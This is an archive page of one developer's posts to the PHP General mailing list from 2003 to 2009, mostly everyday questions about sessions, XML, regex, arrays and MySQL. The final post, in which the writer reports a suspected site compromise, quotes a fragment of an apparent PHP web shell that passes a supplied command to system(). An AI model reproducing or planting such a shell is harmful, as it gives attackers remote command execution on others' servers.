Re: [PHP] Error in Building an XML File

2009-03-09 Thread Joe Harman
On Mon, Mar 9, 2009 at 9:53 AM, Bob McConnell wrote: > From: Joe Harman >> >> I am using PHP to build an XML file, but I keep on getting an XML >> error when open the file in Google Chrome. >> > ---

[PHP] Error in Building an XML File

2009-03-09 Thread Joe Harman
Hello, I am using PHP to build an XML file, but I keep on getting an XML error when open the file in Google Chrome. - This page contains the following errors: error on line 30 at column 318: Entity 'iuml' not defined

[PHP] Action on 'Require' Fatal Error

2008-07-09 Thread Joe Harman
Hello, is there a way to call a function or do a header("Location: page.php") when a fatal error is detected from using a the require statement Thanks Joe Harman

Re: [PHP] Retrive a ID or Class value from a form input field

2008-06-09 Thread Joe Harman
t it would make thing neat and tidy Thanks for all your input Joe On Mon, Jun 9, 2008 at 3:09 PM, Jim Lucas <[EMAIL PROTECTED]> wrote: > Jim Lucas wrote: >> >> Jim Lucas wrote: >>> >>> Joe Harman wrote: >>>> >>>> Hello, >>>>

[PHP] Retrive a ID or Class value from a form input field

2008-06-09 Thread Joe Harman
Hello, is there any way to get more field information other than just the value of a field when a form is submitted??? ex: type, size, class, etc. Thanks Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Web Apps & OpenID

2008-05-07 Thread Joe Harman
though... which is what I want to make it easy& convienent for those repeat customers thanks for your input guys Joe On Wed, May 7, 2008 at 4:04 AM, Colin Guthrie <[EMAIL PROTECTED]> wrote: > > Joe Harman wrote: > > > I am curious here if any of you are considering or al

[PHP] PHP Web Apps & OpenID

2008-05-06 Thread Joe Harman
ghts I've been looking at some PHP scripts out there for OpenID... does anyone have one to recommend??? -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] mysql_connect slowness

2008-04-29 Thread Joe Harman
Hi Waynn! have you ever tried using 1. sql_cache SELECT SQL_CACHE * FROM table .. I use this alot... although you have to have mysql cache enable in the sql config file... your webhost can tell you if it is on or not 2. make indexes for your tables here is a good article http://www.databas

[PHP] Help with preg_match_all regex for alt tags

2008-04-29 Thread Joe Harman
html code] I am currently getting alt="Wheel & Tire Acc" />< I want this result alt="Shoppin

Re: [PHP] Re: Making an array from delimited data

2008-04-28 Thread Joe Harman
Thanks guys... that help me out a lot... i was thinking too hard on ... LOL have a great day! Joe On Mon, Apr 28, 2008 at 3:01 PM, Nathan Nobbe <[EMAIL PROTECTED]> wrote: > On Mon, Apr 28, 2008 at 1:58 PM, Joe Harman <[EMAIL PROTECTED]> wrote: > > > this is the complete

Re: [PHP] Re: Making an array from delimited data

2008-04-28 Thread Joe Harman
this is the complete data that was initially submitted through a textarea field. On Mon, Apr 28, 2008 at 2:56 PM, Shawn McKenzie <[EMAIL PROTECTED]> wrote: > > Joe Harman wrote: > > > I have some data that I pull from a database that is in t

[PHP] Making an array from delimited data

2008-04-28 Thread Joe Harman
$data['Gauge Series'] = 0-11,000 rpm I know I can use explode on on set of data... but up do you do it line by line? Thanks for your help -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] RE:[PHP] Client Computer Registration

2006-10-03 Thread Joe Harman
: [EMAIL PROTECTED] http://www.informed-sources.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Subscribe to my FRIENDS email list by sending an email to [EMAIL PROTECTED] with subject line of "Subscrib

Re: [PHP] IP Address Filtering

2006-03-29 Thread Joe Harman
Good thing I don't have kids! On 3/29/06, Kevin Kinsey <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > >if you really want to mess with them.. only show the user with the > >NULL IP address all the spam posts.. .make them think that they've > >been succ

Re: [PHP] IP Address Filtering

2006-03-29 Thread Joe Harman
him? > > Thanks, > > Rahul S. Johari > Coordinator, Internet & Administration > Informed Marketing Services Inc. > 500 Federal Street, Suite 201 > Troy NY 12180 > > Tel: (518) 687-6700 x154 > Fax: (518) 687-6799 > Email: [EMAIL PROTECTED] > http://www.infor

Re: [PHP] ob_start & session_start

2005-12-07 Thread Joe Harman
want to start a session first... but then again, you guys are the experts... i am sure someone knows a reason when you should not do that. ;o) Joe On 12/8/05, Chris Shiflett <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > Okay...makes sense after you spelled it out to me. >

[PHP] Re: [PHP-DB] ftp_put

2005-12-07 Thread Joe Harman
f achieving this? I'm talking file 5-20megs in size. > > > > Thanks everyone. > > > > Chris > > > -- Joe Harman - * My programs never have bugs, they just develop random features. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] ob_start & session_start

2005-12-07 Thread Joe Harman
session. > If your session uses cookies (this is usually automatically decided by php) > it cannot send out the header after the buffer. > > > On 12/7/05, Joe Harman <[EMAIL PROTECTED]> wrote: > > > > Hello, > > > > Something just crossed my mind about

[PHP] ob_start & session_start

2005-12-07 Thread Joe Harman
Hello, Something just crossed my mind about using output buffering is there any reason why you should start a session before calling ob_start() ??? Just curious which way would be the proper way of doing it... or doesn't it matter? Thanks -- Joe Harman - * My programs never

Re: [PHP] What software do you use for writing PHP?

2005-12-06 Thread Joe Harman
software out there that is more suited to > > writing and editing PHP pages. What do you all use? > > > > Thanks, > > > > Jeff > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php &g

Re: [PHP] Re: [PHP-DB] Drag and Drop with PHP and MySQL

2005-11-18 Thread Joe Harman
st. > > =) > > -Nate Nielsen > [EMAIL PROTECTED] > > - Original Message - > From: "Jasper Bryant-Greene" <[EMAIL PROTECTED]> > To: "Joe Harman" <[EMAIL PROTECTED]> > Cc: > Sent: Friday, November 18, 2005 8:52 PM > Subject: Re:

[PHP] Re: [PHP-DB] Drag and Drop with PHP and MySQL

2005-11-18 Thread Joe Harman
; > database. Is there an interface / programming method I can use which I > can > > DRAG a file from the desktop into an area in a form just as if I had > used a > > file requester to select a file? Learning a new programming technique is > > no problem as long as it can be

Re: [PHP] Any good free easy converting tool?

2005-10-12 Thread Joe Harman
> PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > Hey Gustav!!! I use Navicat... i think they have a free trail package for their software... it's the best that I can find out there!! Good luck! Joe -- Joe Harman - D

Re: [PHP] [Off] How much time should this take?

2005-09-16 Thread Joe Harman
ling List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > Well, we just had a box with a fresh install using http://www.centos.org/ .. it cost about $500 to have someone do it for us.. centos is redhat, apache & mysql and a bunch of other stuff... now that i k

[PHP] Output Buffering Error? 4.3.10??

2005-08-17 Thread Joe Harman
your help! Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: Rasmus' 30 second AJAX Tutorial - [was Re: [PHP] AJAX & PHP]

2005-07-21 Thread Joe Harman
ing this approach a bit to send multiple parameters in the > request, for example, would be really simple. Something like: > > function sndReqArg(action,arg) { > http.open('get', 'rpc.php?action='+action+'&arg='+arg); > http.onreadystatechange = handle

Re: [PHP] AJAX & PHP

2005-07-21 Thread Joe Harman
ven't tried it myself, but this looks rather good, article on how to > implement Google Suggest in PHP: > > http://tinyurl.com/dxs8b > > Paul > > -- > Rogue Tory > http://www.roguetory.org.uk > > -- > PHP General Mailing List (http://www.php.net/) > To unsu

Re: [PHP] Re: Echo array string index?

2005-07-14 Thread Joe Harman
/function.key.php > http://us2.php.net/manual/en/function.array-keys.php > > But once again, it really comes down to what exactly it is you want to > do... > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson

Re: [PHP] text areas and line brakes

2005-06-21 Thread Joe Harman
2 > STFM | http://php.net/manual/en/index.php > STFW | http://www.google.com/search?q=php > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > -- Joe Harman - Do not go where the path may lead, go

[PHP] Re: [SOLVED] Merging Duplicate array items

2005-06-18 Thread Joe Harman
y_value) { do{ if($ary_value['product_id'] == $ARY_cart[$cart_count]['product_id'] && $key <> $cart_count) { $ARY_cart[$cart_count]['quantity'] = $ARY_cart[$cart_count]['quantity

[PHP] Merging Duplicate array items

2005-06-18 Thread Joe Harman
'quantity' => '24', 'product_name' => 'Dog Food', 'unit

Re: [PHP] http to https session problem

2005-06-11 Thread Joe Harman
On 6/11/05, Joe Harman <[EMAIL PROTECTED]> wrote: > On 6/11/05, Richard Lynch <[EMAIL PROTECTED]> wrote: > > On Thu, June 9, 2005 7:43 am, Joe Harman said: > > > I am having a little problem with users keeping the same session id > > > when they go from http

Re: [PHP] Making a page loop with header('Location: ...

2005-06-09 Thread Joe Harman
On 6/9/05, Richard Davey <[EMAIL PROTECTED]> wrote: > Hello Joe, > > Friday, June 10, 2005, 12:36:13 AM, you wrote: > > JH> is it possible to make a page loop with header('Location : > JH> page.php')??? > > JH> I've ran into a little bit of a snag with php execution time... > JH> so, i need to e

[PHP] Making a page loop with header('Location: ...

2005-06-09 Thread Joe Harman
vascript reload -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] http to https session problem

2005-06-09 Thread Joe Harman
ession id in a cookie??? or is there another way or setting -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Happy Birthday, PHP!

2005-06-08 Thread Joe Harman
oughts on PHP's > birthday.) > > Chris > > -- > Chris Shiflett > Brain Bulb, The PHP Consultancy > http://brainbulb.com/ > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > -- Joe H

Re: [PHP] autocomplete a field

2005-06-03 Thread Joe Harman
re dynamic, try > here: > > http://developer.apple.com/internet/webcontent/xmlhttpreq.html > http://jpspan.sourceforge.net/wiki/doku.php > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > > -- Joe Harman

Re: [PHP] PHP and USB Devices

2005-06-01 Thread Joe Harman
... with a PHP front end for user authentication.. someone mentioned using the PHP functions to call the COM object... guess I have do some reading ;o) Cheers Joe Cheers! On 6/1/05, Kim Madsen <[EMAIL PROTECTED]> wrote: > > > -----Original Message- > > From: Joe

Re: [PHP] PHP and USB Devices

2005-05-31 Thread Joe Harman
ld be some sort of other hardware/software solution out there that I will run across... anyhow... thanks for your help... my apologizes for making an off topic request Joe On 5/31/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > On 5/31/05, Joe Harman <[EMAIL PROTECTED]> wrote:

[PHP] PHP and USB Devices

2005-05-31 Thread Joe Harman
Has anyone out there found a way to get information from a USB device running on their computer... what i am trying to do is retrive the fingerprint ID that the Microsoft USB fingerprint reader returns for a finger print and put it in a webpage form??? There has to be a way to do it... -- Joe

Re: [PHP] base64_encode in URLs

2005-05-11 Thread Joe Harman
ess the user clicks to show images > manually. This could fool your automatic counting and email > verification. > > On 5/11/05, Joe Harman <[EMAIL PROTECTED]> wrote: > > HA... Thanks for your thoughts... > > > > I am actually using this for a broadcast email s

Re: [PHP] base64_encode in URLs

2005-05-11 Thread Joe Harman
; On Tue, May 10, 2005 8:50 pm, Joe Harman said: > > Hey just curious if it's okay to encode variables that are passed in > > URLs with base64_encode??? since, I am going to pass a email address > > in the URL, I would like to protect the email address from typical > > p

[PHP] base64_encode in URLs

2005-05-10 Thread Joe Harman
Hey just curious if it's okay to encode variables that are passed in URLs with base64_encode??? since, I am going to pass a email address in the URL, I would like to protect the email address from typical people -- Joe Harman - Do not go where the path may lead, go instead where the

Re: [PHP] Php defense

2005-04-22 Thread Joe Harman
My 2 Cents > ASP is a Platform that supports a number of different microsoft languages which includes ASP Javascript, ASP VBScript, ASP.Net C# & ASP.Net VB ... ASP has a couple of good points to it... most notably is that it is backed by the largest computer company out there.. Microsoft... also,

[PHP] PHP & Wire Ready

2005-04-12 Thread Joe Harman
Hello, Curious if anyone out there has any experience using PHP with Wire Ready??? We've taken over a site that uses the wire ready service... which is all done in ASP and needs to be converted over to PHP?? does anyone have or know of any pre-made classes or functions for dealing with this servi

[PHP] Re: Javascript Calendar and PHP

2005-04-05 Thread Joe Harman
-- Forwarded message -- From: Joe Harman <[EMAIL PROTECTED]> Date: Apr 6, 2005 2:50 AM Subject: Re: [PHP] Re: Javascript Calendar and PHP To: Nadim Attari <[EMAIL PROTECTED]> interakt has a great one that is used with field forms... it's like $30 or something..

Re: [PHP] Re: A strange problem..

2005-04-04 Thread Joe Harman
Hey Josh... make sure your mysql table column is a integer... not a varchar.. i've done that by mistake a few times! On Apr 4, 2005 3:22 PM, chris <[EMAIL PROTECTED]> wrote: > what is the structure of your table? > > "JoShQuNe" <[EMAIL PROTECTED]> wrote in message > news:[EMAIL PROTECTED] > > Hi,

Re: [PHP] Any personal experience with MySQL/Calendar application

2005-03-29 Thread Joe Harman
Hey Todd... I have one that I created and posted at Zend.com ... it can be easily adapted to store data n MySQL... Joe On Tue, 29 Mar 2005 12:33:12 -0500, Peter G. Brown <[EMAIL PROTECTED]> wrote: > I have used egroupware in a company setting and found it to be largely > satisfactory. It might b

Re: [PHP] html image

2005-03-25 Thread Joe Harman
check out http://www.whois.sc they do exactley what you are talking about. i don't think you can make PHP do this.. there maybe someway to do it with imagemagik but i am not even sure about that also... here is a free ware program that does it.. but you have to do it manually http://www.s

[PHP] Storing Arrays in a database

2005-03-24 Thread Joe Harman
CTED] <[EMAIL PROTECTED]> wrote: > check serialize() and unserialize() in manual. > implode() and explode() functions too. > > -afan > > Joe Harman wrote: > > >Hey, > > > >I was curious if anyone here stores arrays in MySQL... and how r u > >doing this

[PHP] Storing Arrays in a database

2005-03-24 Thread Joe Harman
Hey, I was curious if anyone here stores arrays in MySQL... and how r u doing this... are you converting the values to a delimited string or is there another way? Thanks Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] PHP file as homepage?

2005-03-15 Thread Joe Harman
Hey Phil, this can be defined in the apache config file Joe On Tue, 15 Mar 2005 11:10:30 -0500, Phil Neeb <[EMAIL PROTECTED]> wrote: > I've noticed that PHP.net uses index.php as its homepage and well, I'm > curious as to how that's possible. Is it the server setup that allows > them to load a

Re: [PHP] Inline Frame and php

2005-03-01 Thread Joe Harman
Hey Todd... I really think what you are going to have to do is pass a javascript variable to the parent page.. cause you are trying to send a variable from the php search page to the parent that has the iframe in it... I am correct in assuming that? On Tue, 1 Mar 2005 16:33:58 -, Mikey <[EMAI

Re: [PHP] Inline Frame and php

2005-03-01 Thread Joe Harman
Hey Todd, I use iframe alot.. what you have to do is tell it a target... but, i am not sure if you can do that with header('Location:...") .. i would be interested to know also Joe On Mon, 28 Feb 2005 16:30:28 -0800, Todd Cary <[EMAIL PROTECTED]> wrote: > My client insists on using inline Fram

Re: [PHP] Weird Error Help

2005-02-18 Thread Joe Harman
ant error... I did add ob_start() and ob_flush() to the site... that seemed to reduce the occurance of the error though... Thanks! Joe On Thu, 17 Feb 2005 15:41:10 -0800 (PST), Richard Lynch <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > Hey has anyone had an error like

[PHP] Weird Error Help

2005-02-17 Thread Joe Harman
Hey has anyone had an error like this one? and have a solution --- Warning: Unexpected character in input: '' (ASCII=1) state=1 in **/_eid_page_functions.php on line 173 it appears to be very random... could be my PHP code... but t

Re: [PHP] PHP book recommendations>

2005-02-15 Thread Joe Harman
e, 15 Feb 2005 14:20:05 -0500, Joe Harman <[EMAIL PROTECTED]> wrote: > sorry... wrong address > > > On Tue, 15 Feb 2005 14:19:46 -0500, Joe Harman <[EMAIL PROTECTED]> wrote: > > personally, I like Julie Meloni's books... PHP essentials.. and fast > > and

Re: [PHP] Log-in script help

2005-01-26 Thread Joe Harman
Tom, That's a great tip! Joe On Wed, 26 Jan 2005 10:03:31 +, Tom <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > >Hey Andrew... > > > >IN MY OPINION... forget the cookies... only use php sessions... but > >like I said IMO you can never re

Re: [PHP] Log-in script help

2005-01-25 Thread Joe Harman
Hey Andrew... IN MY OPINION... forget the cookies... only use php sessions... but like I said IMO you can never rely on the end user having them cookies enabled... same with things like javascript... let me outline some steps for you... everyone else... feel free to state pros and cons to th

[PHP] Replace credit card numbers with X ???

2005-01-25 Thread Joe Harman
Hello, I need to replace all the numbers of a credit card except for the last 4 with an 'X' ... can't seem to locate the string function for this... can someone point me in the right direction here to what php item i should be using. Thanks! Joe -- PHP General Mailing List (http://www.php.net/)

Re: [PHP] Re: [NEWBIE GUIDE] For the benefit of new members

2005-01-25 Thread Joe Harman
Great List... although.. .just having a sense humor here... i think every topic has been covered a number of times... which means no one should be posting questions at the php list... cause they are all in the archive :0) cheers! Joe On Tue, 25 Jan 2005 09:48:53 -0500, Jason Barnett <[EMAIL PRO

[PHP] Re: [PHP-DB] checkboxes

2005-01-21 Thread Joe Harman
Well.. i just got done doing something like what you are trying to accomplish... you will need to name your check boxes like so : name="completed[]" when the form is submitted, I use something like this and shove it into a field in the database: if($_POST['completed'] <> NULL) { // This makes one

[PHP] On large application organization [long and possibly boring]

2005-01-07 Thread Joe Harman
This is Definatley a good conversation... I've realy thought of doing it this way... but i do agree with the person who said that 'having to keep track of a ton of different files could get complicated" ... i can't imagine the performance difference would be that big... but then again, i suppose it

[PHP] Updated: Calendar Script

2005-01-04 Thread Joe Harman
// Current Day $cal_generated .= "".$temp_filler .""; //$show_next $next_hour_Link = "onclick=\"window.location.href='?epo

[PHP] Calendar Script

2004-12-29 Thread Joe Harman
rst_week_marked = TRUE;}  $week_day_count = $the_first_day_of_the_month['wday'];} while ($first_week_marked == FALSE);  }   else{ $cal_generated .= "".$highlight_today_o

[PHP] Calendar Script

2004-12-29 Thread Joe Harman
rst_week_marked = TRUE;}  $week_day_count = $the_first_day_of_the_month['wday'];} while ($first_week_marked == FALSE);  }   else{ $cal_generated .= "".$highlight_today_open ."".$mo

[PHP] Help with a image upload class

2004-07-21 Thread Joe Harman
Hello, I was curious if someone would help me alter this class so that instead of using it to upload images... I could send it a full URL path to an image, and it would save it to my server... Thanks, Joe Class --- 300 kbyte // $file_perm = array with mi

[PHP] Storing website templates in sessions

2004-07-07 Thread Joe Harman
Hey everyone... I was curious if anyone out there has some pros and cons to storing a website template that is extracted from a mysql db and stored in a session... is this an efficient way to do it? also... does anyone know what the size limitations for a session would be? Thanks, Joe -- PHP G

RE: [PHP] Question about array limits & practicallity

2004-01-21 Thread Joe Harman
Thanks for your comments Chris and Rob... Chris you have great points to make, my ears are wide open... The reason I thought about storing the array in a blob is because every test generated will be different. the 102 question test will be generate randomly from a bank of 500 questions.. That mea

[PHP] Question about array limits & practicallity

2004-01-21 Thread Joe Harman
I am curious how much data an array can hold.. And what the pros and cons are. Example.. I am making a testing system that will give a student a 102 question test... The test would be generated so that each one is different... So would it be practical to load all 102 questions and their options

[PHP] Converting PHP code to class

2004-01-18 Thread Joe Harman
Hey, Just curious if anyone here would be interested in helping me convert my PHP Calendar into a class... I am not to good at it... But I figure if someone would like to do it they could get this nifty calendar program that I made... Nice little trade... Let me know and I will forward the code.

RE: [PHP] POST method for hyperlink

2004-01-17 Thread Joe Harman
Thanks Richard... I will do some erading on that Cheers! Joe -Original Message- From: Richard Davey [mailto:[EMAIL PROTECTED] Sent: Saturday, January 17, 2004 11:08 PM To: Joe Harman Cc: [EMAIL PROTECTED] Subject: Re: [PHP] POST method for hyperlink Hello Joe, Sunday, January 18

[PHP] POST method for hyperlink

2004-01-17 Thread Joe Harman
Hello, I am curious if there is anyway to take a variable that is passed via a URL by a reguler text hyperlink Ex: http://localhost/Calendar/active_layout.php?d=2.1.2004 and hide it like you would do with the POST method using forms Ex: http://localhost/Calendar/active_layout.php Hidden or POS

[PHP] Echo HTML code Verses breaking out of

2003-11-21 Thread Joe Harman
Hello, I would like some opinions, or hopefully facts on a few things... Maybe some people can help me out here. A friend of mine and I were discussing which is best way to use PHP building dynamic pages, here are the 2 methods we are comparing.. They are in the simplest terms here... But try to

RE: [PHP] MySQL get second row problem [Solved]

2003-10-02 Thread Joe Harman
Hey Thanks Petre Cheers... And a big brain fart > -Original Message- > From: Petre Agenbag [mailto:[EMAIL PROTECTED] > Sent: Thursday, October 02, 2003 6:17 AM > To: Joe Harman > Cc: [EMAIL PROTECTED] > Subject: Re: [PHP] MySQL get second row problem > > >

[PHP] MySQL get second row problem

2003-10-02 Thread Joe Harman
Hello... I am having just alittle trouble with this... I know it's simple... Look at my comment for the problem I am having Thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] PNGs & PHP feedback

2003-09-29 Thread Joe Harman
Hello, I am looking for some guidance... I am using PHP to make dynamic buttons... Is the PNG image format a pretty safe thing to go with... Standard wise? Thanks for your input. Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] IP to Postal Code CSV? anyone messed around with this and PHP

2003-09-23 Thread Joe Harman
Is there a CSV file out there for this Does anyone know where I can aquire a file that has IP address with the corresponding Postal Code? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] [Thoughts About This] [Newbie Guide] For the benefit of new members

2003-09-05 Thread Joe Harman
Great guide here Ma Siva Kumar... I am a little guilty of not doing this, actually recently too... As I think most of us are at one point or another... Although I would like to add alittle something, maybe just alittle guidance for newbies and seasoned professionals like yourself! 1. Helping those

[PHP] Thanks Richard Schwartz

2003-09-04 Thread Joe Harman
Dude stop being a jerk, I don't treat people this way... Ah, anyhow... It's not me who will judge you Is it? > -Original Message- > From: Richard Schwartz [mailto:[EMAIL PROTECTED] > Sent: Thursday, September 04, 2003 11:28 AM > To: Joe Harman > Subject:

[PHP] Restart Apache with PHP???

2003-09-02 Thread Joe Harman
Hey guys & gals... Is there a way to restart Apache with a PHP command? Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] PHP - XHTML converter to HDML or WML

2003-08-29 Thread Joe Harman
different errors. So the first step would be to figure out how to determine a cell phone user's browser. So what's it capable of WML 1.1 or WML 2.0, HDML.. Or XHTML Appreciate the feedback, Joe Harman http://www.HarmanMedia.com Have you ever noticed? Anybody going slower than you is an

RE: [PHP] Easy XML & PHP tutorials ?????

2003-08-21 Thread Joe Harman
Burhan! Thanks a lot... This is great... I am going through it right ... Have a great day! Joe > -Original Message- > From: Burhan Khalid [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 21, 2003 10:35 PM > To: Joe Harman; [EMAIL PROTECTED] > Subject: Re: [PHP]

[PHP] Easy XML & PHP tutorials ?????

2003-08-21 Thread Joe Harman
Hello all. does anyone have any very easy XML tutorials . I have a simple weather feed I want to implement. but no XML experience thanks Joe Harman

RE: [PHP] error: cannot redeclare ()

2003-08-14 Thread Joe Harman
Hi Martin... I am guessing you have a nested function that is being redeclared, your error would come from there... Just a guess anyhow... Joe > -Original Message- > From: Martin Towell [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 07, 2003 2:11 AM > To: [EMAIL PROTECTED] > Subject:

[PHP] postmaster@hanmir.com

2003-08-14 Thread Joe Harman
Hey is every one getting a returned message from [EMAIL PROTECTED] Joe Harman

[PHP] Installer Software

2003-08-14 Thread Joe Harman
n the desktop... can anyone recommend anything out there.. preferably that is free Respectfully, Joe Harman

RE: [PHP] Still can't pass variable through url

2003-08-12 Thread Joe Harman
http://www.thingamajigger.com/index.php?year=$year&month=$month\"; >yeah this is the link"; ?> > -Original Message- > From: John Manko [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:47 AM > To: Martin Towell > Cc: 'Jack'; [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: Re:

[PHP] Flash Actionscript List or Forum

2003-08-12 Thread Joe Harman
Hello all, I've been doing PHP for a little while now... I am starting learn Action Script now... and having trouble with global variables and functions... does anyone know where I find a good list or forum for action script? Joe Harman http://www.HarmanMedia.com I used to think

RE: [PHP] Re: [ERR] DEAD MAILBOX

2003-08-11 Thread Joe Harman
CHRISTMAS IN AUGUST! > -Original Message- > From: andu [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:53 AM > To: [EMAIL PROTECTED] > Subject: Re: [PHP] Re: [ERR] DEAD MAILBOX > > > On Fri, 08 Aug 2003 02:52:31 -0400 > John Manko <[EMAIL PROTECTED]> wrote: > > > arrg.

RE: [PHP] Still can't pass variable through url.. whoops

2003-08-08 Thread Joe Harman
YEPPERS.. You're right > -Original Message- > From: Martin Towell [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:59 AM > To: 'Joe Harman'; [EMAIL PROTECTED] > Subject: RE: [PHP] Still can't pass variable through url > >

RE: [PHP] Still can't pass variable through url

2003-08-08 Thread Joe Harman
Jack... Can you paste your code into an email and post it > -Original Message- > From: Jack [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:30 AM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: [PHP] Still can't pass variable through url > > > Dear all > I had set the

RE: [PHP] PHP & P2P File sharing

2003-08-06 Thread Joe Harman
make a file locker type app for them Joe > -Original Message- > From: Chris Shiflett [mailto:[EMAIL PROTECTED] > Sent: Wednesday, August 06, 2003 11:28 PM > To: Joe Harman; [EMAIL PROTECTED] > Subject: Re: [PHP] PHP & P2P File sharing > > > --- Joe Harman <

[PHP] PHP & P2P File sharing

2003-08-06 Thread Joe Harman
Hello, I curious if anyone knows of a PHP based Peer-to-Peer file sharing program out there! I have a friend that wants to implement this with his web server.. Joe Harman

RE: [PHP] Tracking Users via Cookies? IDEA

2003-08-04 Thread Joe Harman
What if you could read a browser's history file... There has to be a way to do this with something like javascript... Just an idea... Joe -Original Message- From: Ryan A [mailto:[EMAIL PROTECTED] Sent: Sunday, August 03, 2003 9:03 PM To: Jason Bourque Cc: [EMAIL PROTECTED] Subject: Re:

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Yes I agree it would be funny... In my opinion there is no need for the ASP platform... But then again, who am I for having an educated opinion, I let a hacker put a shell script on my site NOW THAT'S FUNNY! -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday,

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Oh, do you mean like Chilisoft for PHP on a IIS server... LOL.. That would be funny -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 10:13 AM To: Jay Blanchard Cc: Ralph Guzman; PHP General Mailing List Subject: Re: [PHP] Article: PHP vs ASP I'

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread Joe Harman
ified my webhost... I guess it wasn't the first time they've seen this... So the are taking action on it and probably canceling my account... LOL... Thanks for all your help! Joe -Original Message- From: Joel Rees [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 3:10 AM

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-30 Thread Joe Harman
Fortunatly I don't think they were doing something correctly, cause it didn't deface my site like some of the others Thanks all Joe -Original Message- From: Adrian [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 2:14 AM To: [EMAIL PROTECTED] Subject: Re: [PHP] Possible My W

[PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-30 Thread Joe Harman
trapping? Abaixo, terminal onde aparecerá os resultados dos comandos que você executou /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); } else { system($command); } } ?> Crime Perfect 2003 By _m4st3r_c0d3 - #crimeperfect Joe Harman http://www.HarmanMedia.com Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - Albert Einstein

  1   2   >